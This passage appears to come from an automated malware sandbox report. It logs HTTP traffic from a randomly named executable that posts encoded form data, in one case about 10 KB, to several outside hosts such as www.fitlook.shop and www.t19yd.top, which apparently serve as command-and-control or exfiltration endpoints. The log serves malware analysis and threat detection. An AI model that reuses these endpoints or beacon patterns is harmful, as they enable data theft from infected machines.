                                                                    Data Raw: 43 30 6f 44 3d 35 6c 6b 70 66 59 33 30 31 51 66 42 74 65 72 65 66 4c 43 68 74 6c 54 4d 51 6b 36 46 50 62 43 78 56 58 78 46 6e 78 4a 5a 67 54 33 7a 78 7a 66 4d 72 2b 62 62 6f 59 2f 2f 66 4a 55 6d 75 34 69 77 79 2b 6e 30 30 6f 4b 4d 76 30 5a 36 6d 67 41 76 66 4d 6e 4e 41 53 78 70 6e 4a 73 45 42 4b 79 73 61 31 49 57 7a 4f 4a 6a 53 66 61 42 34 63 73 68 71 4d 48 2b 55 71 6b 76 51 59 47 42 4e 77 6c 59 57 33 68 36 34 62 6e 4c 7a 50 73 42 76 44 52 75 50 62 51 4b 6b 4b 6c 4f 51 41 65 69 52 58 37 45 71 43 56 4d 37 35 58 6a 47 53 6f 74 6d 35 6d 47 4b 6d 78 72 73 65 33 64 76 70 66 56 37 31 36 4e 69 33 69 42 49 44 79 4a 54 4a 63 66 38 4f 62 63 4b 62 55 35 6e 72 5a 31 72 4e 33 31 44 52 75 70 48 61 56 4e 57 69 35 6f 77 6d 33 47 78 30 54 66 2f 36 65 6f 6d 32 6d 34 71 58 50 58 6a 66 66 66 6c 7a 51 35 2f 30 4a 32 54 46 2f 7a 67 78 6b 71 6e 59 74 67 66 36 4d 54 49 41 77 6a 4b 34 7a 34 4d 4a 49 6a 58 36 79 31 4a 54 6c 53 68 58 37 4e 52 4e 33 43 5a 2b 31 6c 64 76 4e 72 47 39 39 6a 46 2b 75 59 47 7a 47 74 47 30 71 52 59 [TRUNCATED]
                                                                    Data Ascii: C0oD=5lkpfY301QfBterefLChtlTMQk6FPbCxVXxFnxJZgT3zxzfMr+bboY//fJUmu4iwy+n00oKMv0Z6mgAvfMnNASxpnJsEBKysa1IWzOJjSfaB4cshqMH+UqkvQYGBNwlYW3h64bnLzPsBvDRuPbQKkKlOQAeiRX7EqCVM75XjGSotm5mGKmxrse3dvpfV716Ni3iBIDyJTJcf8ObcKbU5nrZ1rN31DRupHaVNWi5owm3Gx0Tf/6eom2m4qXPXjffflzQ5/0J2TF/zgxkqnYtgf6MTIAwjK4z4MJIjX6y1JTlShX7NRN3CZ+1ldvNrG99jF+uYGzGtG0qRYQv6ffBPE9R0gLEzqs6NsJji+EMZyeZMUvjyrFI7YnotEyZapO3RJQjO3jaf+npZ/iY9mUL/gqK5SaN0cj5VeGUrSdrrN5a4lrmiw8wC1au+nL1ywUYuWZhpey8h7AcyxWY/5Oo6DchUmyTNpEvgGLSckcrI3cMZZFWF/s/GNEdYMz+Hpj4KYJCo8dHOeOHuj93iy8kSkp6VKhfGSHL9aBejCB/w0oBeoajzy1xH1IW2gwVn7ZLxXNw5ZJ6W/cZ2yyu4hJbmFE65M3+pBpwDOqNZthHryQXs+JKVsAML+BvEBC9y/iPA2oH/ednkxG0OqmCL0nztwgENSdqTbxHO4zMp9l/USCQt32B1InAdAYETvaR/jK/ekQd8COYUq2F8w5g209HFon0jYX/CciH8aK1bZdNo7iV/x4wrEhwZu6Zliz2eYwOZC78O5RYyo6gQAOZ/lGPKwFSEAZt2d2r6OF7+IMF/CVhOeiEK7r9OCmiI91gtTE5sBmaPxcnjbxb3xNQIQwMdqScCnRcYshv595KcegVlaGQguuArtUS2M0mlYZlil8X+5hCRFTjyUrVejMAWQkwIKyn+Yi7MT2h8m8PL+e+IksxJMvxo2sOv5EtKTJqugA08penTarmnrqtJcx2O1996ZfP6THM//2cimeqZb2oNDEM83PB [TRUNCATED]
                                                                    Nov 12, 2024 18:48:34.671842098 CET312INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:48:34 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 148
                                                                    Connection: close
                                                                    ETag: "66df9b06-94"
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.44995538.47.232.202804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:36.271267891 CET535OUTGET /6iur/?C0oD=0nMJct3q1A3XzMXjE+ivshWrQE+XNY2vZkYEnxQvgljfmjLPkYHFjKqOBb0jruiOvYz34q23vFgZrlJgY/jJPVhUzqIQSZTSSXUfz9p/TbKa5+cetqeuNbw=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.43kdd.top
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:48:37.220454931 CET312INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:48:37 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 148
                                                                    Connection: close
                                                                    ETag: "66df9b06-94"
                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.45001513.248.169.48804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:50.631124020 CET797OUTPOST /34uy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fitlook.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.fitlook.shop
                                                                    Referer: http://www.fitlook.shop/34uy/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 48 51 6c 2b 6b 6b 73 51 33 51 37 57 78 54 53 76 6d 63 34 64 5a 31 6f 45 41 31 50 6a 56 35 71 66 6f 4a 36 55 79 62 4e 32 35 41 5a 45 33 62 55 6b 56 72 56 46 37 48 36 76 53 37 43 50 51 44 76 6e 64 33 4a 56 5a 4f 51 37 76 43 46 49 7a 77 36 30 48 66 41 7a 41 51 45 30 5a 6d 30 37 48 6a 53 30 79 74 79 46 6f 6d 41 74 36 78 5a 55 78 69 59 77 49 4f 4e 74 44 53 59 31 49 47 69 75 6e 71 59 58 58 61 41 65 79 32 68 4b 73 64 34 55 73 52 6e 59 6e 50 30 31 41 6a 58 65 73 65 73 68 39 4a 6c 53 6d 33 4c 33 57 71 71 53 53 52 71 55 72 65 6a 36 51 4f 78 74 4e 46 38 41 39 59 56 63 58 62 78 45 5a 77 3d 3d
                                                                    Data Ascii: C0oD=HQl+kksQ3Q7WxTSvmc4dZ1oEA1PjV5qfoJ6UybN25AZE3bUkVrVF7H6vS7CPQDvnd3JVZOQ7vCFIzw60HfAzAQE0Zm07HjS0ytyFomAt6xZUxiYwIONtDSY1IGiunqYXXaAey2hKsd4UsRnYnP01AjXesesh9JlSm3L3WqqSSRqUrej6QOxtNF8A9YVcXbxEZw==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.45001613.248.169.48804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:53.256110907 CET817OUTPOST /34uy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fitlook.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.fitlook.shop
                                                                    Referer: http://www.fitlook.shop/34uy/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 48 51 6c 2b 6b 6b 73 51 33 51 37 57 67 48 57 76 68 50 41 64 66 56 6f 48 5a 46 50 6a 62 5a 71 62 6f 4a 32 55 79 59 41 70 34 31 42 45 32 2f 51 6b 55 70 39 46 38 48 36 76 61 62 44 46 66 6a 76 77 64 77 42 33 5a 50 73 37 76 47 74 49 7a 77 4b 30 48 75 41 30 53 51 45 79 41 32 30 39 4a 44 53 30 79 74 79 46 6f 6e 6b 48 36 78 42 55 79 53 49 77 4f 76 4e 75 50 79 59 32 50 47 69 75 6a 71 5a 2f 58 61 41 73 79 79 42 30 73 66 77 55 73 56 6a 59 2b 36 41 79 4a 6a 58 59 69 2b 74 41 34 35 73 37 6e 6c 69 71 4a 70 32 38 57 78 2b 34 6a 34 75 67 42 2f 51 36 66 46 59 7a 67 66 63 6f 61 59 4d 4e 43 77 49 34 37 39 33 66 73 48 65 44 7a 56 49 61 6c 7a 58 69 72 2f 38 3d
                                                                    Data Ascii: C0oD=HQl+kksQ3Q7WgHWvhPAdfVoHZFPjbZqboJ2UyYAp41BE2/QkUp9F8H6vabDFfjvwdwB3ZPs7vGtIzwK0HuA0SQEyA209JDS0ytyFonkH6xBUySIwOvNuPyY2PGiujqZ/XaAsyyB0sfwUsVjY+6AyJjXYi+tA45s7nliqJp28Wx+4j4ugB/Q6fFYzgfcoaYMNCwI4793fsHeDzVIalzXir/8=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.45001713.248.169.48804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:55.806242943 CET10899OUTPOST /34uy/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.fitlook.shop
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.fitlook.shop
                                                                    Referer: http://www.fitlook.shop/34uy/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 48 51 6c 2b 6b 6b 73 51 33 51 37 57 67 48 57 76 68 50 41 64 66 56 6f 48 5a 46 50 6a 62 5a 71 62 6f 4a 32 55 79 59 41 70 34 32 68 45 33 4d 49 6b 57 49 39 46 39 48 36 76 55 37 44 49 66 6a 76 49 64 78 6c 7a 5a 50 67 72 76 41 70 49 79 54 79 30 42 61 30 30 59 51 45 79 49 57 30 38 48 6a 54 73 79 75 4b 42 6f 6e 30 48 36 78 42 55 79 51 41 77 4a 2b 4e 75 4a 79 59 31 49 47 69 69 6e 71 5a 45 58 65 55 57 79 79 45 50 73 76 51 55 76 31 7a 59 38 73 63 79 47 6a 58 61 6c 2b 74 69 34 35 77 67 6e 6c 2b 6d 4a 71 71 57 57 7a 69 34 6d 2f 44 70 62 4e 73 65 4a 47 38 50 33 34 78 4e 54 34 4d 74 63 78 55 41 2b 6f 58 6f 7a 79 2b 39 77 6d 5a 74 67 53 66 2f 76 36 48 4d 4c 39 31 45 44 32 6f 6e 4c 61 36 70 56 67 57 6b 49 2b 76 58 35 49 6d 53 4c 41 57 69 62 53 65 79 37 55 6f 4b 74 77 50 4c 74 77 68 75 32 4b 75 79 6a 4d 49 77 33 4e 69 49 47 61 36 37 48 52 78 49 30 30 77 2b 47 43 56 36 47 64 5a 76 6b 64 75 6a 7a 57 66 74 5a 31 2b 32 72 51 50 69 65 77 52 67 2b 46 6c 56 78 54 7a 56 50 6c 6a 2b 6d 46 36 78 75 31 46 75 44 [TRUNCATED]
                                                                    Data Ascii: C0oD=HQl+kksQ3Q7WgHWvhPAdfVoHZFPjbZqboJ2UyYAp42hE3MIkWI9F9H6vU7DIfjvIdxlzZPgrvApIyTy0Ba00YQEyIW08HjTsyuKBon0H6xBUyQAwJ+NuJyY1IGiinqZEXeUWyyEPsvQUv1zY8scyGjXal+ti45wgnl+mJqqWWzi4m/DpbNseJG8P34xNT4MtcxUA+oXozy+9wmZtgSf/v6HML91ED2onLa6pVgWkI+vX5ImSLAWibSey7UoKtwPLtwhu2KuyjMIw3NiIGa67HRxI00w+GCV6GdZvkdujzWftZ1+2rQPiewRg+FlVxTzVPlj+mF6xu1FuDy/4YZmAe7FVSRTE9zNhEsNi6+buXoAKZo3L84ZxH7cXtxNqk9Ch4kxpKrmN4TqSGKRK1ZwG+WccQZfe+cJu+prRyuaBWhRqp6siecArucOHoym/LpbfFI2JsZ2ws58kHRu3ibR5ZcUHOyl2wz/kQb1OTl8bvON8MnsQtTlzhL8hzKRTJimPii46PgTMsYO4l4CcTuMm6glWMXZkBDGyUYh8imBNrOtKV6ocdXWgsmocm/QlCXPbXc4FdC5ffG2I6Z85AlnfrQaCyNOfDrymbh0XEx365OSlZ/AfsR9FAKpSVnrc77bEi5V1+ElWci9GAkPpNS+zZmFziXYdR5a7EaYgaREgAEoMcMefBLCkoiSi9C9cJUgFk4ykNZHERf/37N9hjU2mRVh/sZcqCi/PAK8BlGTum9rtuBOQsZ/NlI0/7jrE7SEyEfI0YtEEz3fA92fC4UVE/RSzZcXKX2rfm58LT+DfZwOYa88xGdD/d0rs+BQnH+kbUTYmNBaMU8bbw2Z/VZ0HWps1w/poeEjM/ww/IINv8PRfE32le3XSfWmALc/wRgVfVjK6vmBfoIpRCBwiSZnsw37PdAZysNuJYzgG4rqHYHc5Vz/qIzXcCpk3Ps3/+snfvMJHZW0qNLac6jzlyLAPB2twuITZWJqUvTbALkwmVHR2xzo [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.45001813.248.169.48804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:48:58.348754883 CET538OUTGET /34uy/?C0oD=KSNenRUz0x3jwwaFmZETAA9KYzPdWounuY72k7Av3QdD/OE/Wc5w7TzUcZjUVirDVR5tYsYUnylr3EOuBfofYgQDaG0iHWLP0vmwml0k5CsL5iUNPuoNBRw=&SJLty=7Zsl8bAHqdkHEnH HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Host: www.fitlook.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Nov 12, 2024 18:48:58.999310970 CET402INHTTP/1.1 200 OK
                                                                    Server: openresty
                                                                    Date: Tue, 12 Nov 2024 17:48:58 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 262
                                                                    Connection: close
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 43 30 6f 44 3d 4b 53 4e 65 6e 52 55 7a 30 78 33 6a 77 77 61 46 6d 5a 45 54 41 41 39 4b 59 7a 50 64 57 6f 75 6e 75 59 37 32 6b 37 41 76 33 51 64 44 2f 4f 45 2f 57 63 35 77 37 54 7a 55 63 5a 6a 55 56 69 72 44 56 52 35 74 59 73 59 55 6e 79 6c 72 33 45 4f 75 42 66 6f 66 59 67 51 44 61 47 30 69 48 57 4c 50 30 76 6d 77 6d 6c 30 6b 35 43 73 4c 35 69 55 4e 50 75 6f 4e 42 52 77 3d 26 53 4a 4c 74 79 3d 37 5a 73 6c 38 62 41 48 71 64 6b 48 45 6e 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?C0oD=KSNenRUz0x3jwwaFmZETAA9KYzPdWounuY72k7Av3QdD/OE/Wc5w7TzUcZjUVirDVR5tYsYUnylr3EOuBfofYgQDaG0iHWLP0vmwml0k5CsL5iUNPuoNBRw=&SJLty=7Zsl8bAHqdkHEnH"}</script></head></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.45001938.47.207.164804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:04.379703999 CET788OUTPOST /pmk2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.t19yd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 201
                                                                    Connection: close
                                                                    Origin: http://www.t19yd.top
                                                                    Referer: http://www.t19yd.top/pmk2/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 36 42 32 58 62 4a 41 31 4d 33 68 56 43 6b 38 58 55 75 6e 56 38 42 64 75 6f 71 4f 78 63 74 74 52 55 65 65 30 50 55 4b 2f 7a 49 50 77 52 66 4c 57 6f 53 30 53 4d 62 56 6f 30 77 76 5a 2b 43 71 74 41 4f 4d 35 59 45 79 4d 61 64 67 38 4d 38 74 68 44 57 41 6a 4b 4a 73 4c 61 54 33 57 70 56 4f 6c 52 54 59 36 55 71 32 6f 74 53 65 58 68 63 57 31 6a 59 76 65 76 31 58 49 67 4e 76 55 4f 50 2f 42 39 76 62 72 54 76 44 50 66 70 2f 50 68 39 6b 56 34 50 59 6f 54 51 6d 71 66 38 4e 44 68 57 62 78 5a 44 6c 53 6a 34 66 42 67 62 75 61 53 52 52 78 4b 44 6c 44 37 32 4e 54 4d 46 31 53 70 36 58 77 66 77 3d 3d
                                                                    Data Ascii: C0oD=6B2XbJA1M3hVCk8XUunV8BduoqOxcttRUee0PUK/zIPwRfLWoS0SMbVo0wvZ+CqtAOM5YEyMadg8M8thDWAjKJsLaT3WpVOlRTY6Uq2otSeXhcW1jYvev1XIgNvUOP/B9vbrTvDPfp/Ph9kV4PYoTQmqf8NDhWbxZDlSj4fBgbuaSRRxKDlD72NTMF1Sp6Xwfw==
                                                                    Nov 12, 2024 18:49:05.580292940 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:49:05 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "6693de8b-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.45002038.47.207.164804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:06.923726082 CET808OUTPOST /pmk2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.t19yd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 221
                                                                    Connection: close
                                                                    Origin: http://www.t19yd.top
                                                                    Referer: http://www.t19yd.top/pmk2/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 36 42 32 58 62 4a 41 31 4d 33 68 56 44 48 6b 58 57 4e 2f 56 35 68 64 68 30 61 4f 78 54 4e 74 56 55 65 53 30 50 56 4f 52 7a 2b 66 77 52 2b 37 57 72 51 4d 53 42 37 56 6f 38 51 75 52 67 79 71 63 41 4f 52 45 59 42 4b 4d 61 63 41 38 4d 35 52 68 41 6c 6f 67 4c 5a 73 4a 62 6a 33 55 32 6c 4f 6c 52 54 59 36 55 72 53 52 74 53 47 58 68 73 6d 31 69 35 76 66 6d 56 58 4c 77 64 76 55 4b 50 2f 61 39 76 61 4f 54 74 32 6b 66 71 58 50 68 2b 77 56 34 65 59 72 45 41 6d 7a 62 38 4d 56 79 48 6d 49 54 57 41 43 73 61 50 64 68 34 61 71 58 58 63 72 62 79 45 55 70 32 70 67 52 43 38 6d 6b 35 71 35 45 37 6b 53 46 63 74 53 6c 4e 41 34 59 2b 6b 75 58 6e 61 32 4d 73 45 3d
                                                                    Data Ascii: C0oD=6B2XbJA1M3hVDHkXWN/V5hdh0aOxTNtVUeS0PVORz+fwR+7WrQMSB7Vo8QuRgyqcAOREYBKMacA8M5RhAlogLZsJbj3U2lOlRTY6UrSRtSGXhsm1i5vfmVXLwdvUKP/a9vaOTt2kfqXPh+wV4eYrEAmzb8MVyHmITWACsaPdh4aqXXcrbyEUp2pgRC8mk5q5E7kSFctSlNA4Y+kuXna2MsE=
                                                                    Nov 12, 2024 18:49:07.868855000 CET302INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Tue, 12 Nov 2024 17:49:07 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 138
                                                                    Connection: close
                                                                    ETag: "6693de8b-8a"
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.45002138.47.207.164804176C:\Program Files (x86)\vZklQPYGCrpswQMMImUCYODukgPEQCJuFRQCuATnjaXuIlxjgbbjjraDNoIAJbXnboDRDUx\GhotoFFnRo.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 12, 2024 18:49:09.468501091 CET10890OUTPOST /pmk2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.t19yd.top
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 10301
                                                                    Connection: close
                                                                    Origin: http://www.t19yd.top
                                                                    Referer: http://www.t19yd.top/pmk2/
                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                    Data Raw: 43 30 6f 44 3d 36 42 32 58 62 4a 41 31 4d 33 68 56 44 48 6b 58 57 4e 2f 56 35 68 64 68 30 61 4f 78 54 4e 74 56 55 65 53 30 50 56 4f 52 7a 2b 58 77 52 49 76 57 72 33 67 53 41 37 56 6f 32 77 75 51 67 79 71 37 41 4f 4a 41 59 42 50 35 61 5a 45 38 4e 63 64 68 55 45 6f 67 43 5a 73 4a 65 54 33 52 70 56 50 6c 52 54 49 32 55 72 43 52 74 53 47 58 68 75 75 31 72 49 76 66 71 31 58 49 67 4e 76 59 4f 50 2b 31 39 76 79 30 54 74 7a 66 66 62 33 50 68 65 67 56 2f 73 77 72 48 67 6d 6d 56 63 4d 64 79 48 71 70 54 53 67 4f 73 62 4c 6e 68 2f 79 71 62 54 39 32 4f 47 4e 4e 36 58 45 39 53 7a 67 32 6f 5a 6a 35 50 49 34 4a 41 4e 38 4a 36 39 77 47 62 73 56 32 4b 46 2b 6f 62 4d 41 36 73 36 38 6d 30 73 4d 43 53 35 4a 54 43 51 44 32 31 5a 7a 41 34 54 79 58 57 6b 43 73 72 76 41 77 41 30 6f 52 67 33 35 31 66 64 66 73 73 36 65 42 74 36 34 53 4e 31 4f 70 66 73 6d 69 55 76 78 59 37 2f 30 44 58 30 61 6d 66 36 33 79 6a 6d 38 72 39 4e 63 63 59 69 6d 50 6a 4b 4f 38 69 37 41 50 56 6d 54 59 54 50 73 51 71 71 51 6b 37 39 7a 71 38 72 53 6b 4c [TRUNCATED]
